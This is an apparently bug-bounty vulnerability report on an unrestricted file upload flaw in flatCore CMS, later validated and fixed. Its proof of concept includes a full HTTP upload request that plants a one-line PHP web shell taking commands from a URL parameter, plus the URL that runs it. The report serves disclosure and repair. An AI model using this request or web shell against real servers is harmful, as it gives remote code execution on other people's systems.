Unrestricted Upload of File with Dangerous Type in flatcore/flatcore-cms

Valid

Reported on

Oct 12th 2021


Description

Even with $fc_upload_addons = false, an attacker can still upload files by making the post request

Proof of Concept

  1. Enable $fc_upload_addons = true.
  2. Upload a PHP file, but do not send.
  3. Disable $fc_upload_addons = true.
  4. Send the file upload request. See that the file is still being uploaded to upload/plugins directory.

The following request uploads a malicious PHP script onto the server

POST /flatCore-CMS/acp/core/files.upload-script.php HTTP/1.1
Host: 10.0.2.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------167305252220314413616184565
Content-Length: 516
Origin: http://10.0.2.15
Connection: close
Referer: http://10.0.2.15/flatCore-CMS/acp/acp.php?tn=moduls&sub=u&plg=zipslip.zip
Cookie: acptheme=dark; PHPSESSID=6ffjvvcureq3dkrb4vco57bq6f

-----------------------------167305252220314413616184565
Content-Disposition: form-data; name="upload_type"
plugin
-----------------------------167305252220314413616184565
Content-Disposition: form-data; name="csrf_token"
acd4ba1989b9845c1de2364dcd3450cc

-----------------------------167305252220314413616184565
Content-Disposition: form-data; name="file"; filename="pwn.php"
Content-Type: application/x-php

<?php
system($_GET["cmd"]);
?>
-----------------------------167305252220314413616184565--

5: Go to http://10.0.2.15/flatCore-CMS/upload/plugins/pwn.php?cmd=id to execute the malicious PHP script.

Impact

This vulnerability is capable of remote code execution with admin privileges

Recommended Fix

This occurs because files.upload-script.php does not check $fc_upload_addons is true before uploading.

haxatron modified their report
2 months ago
haxatron modified their report
2 months ago
Patrick validated this vulnerability 2 months ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Patrick confirmed that a fix has been merged on 1c31fc 2 months ago
Patrick has been awarded the fix bounty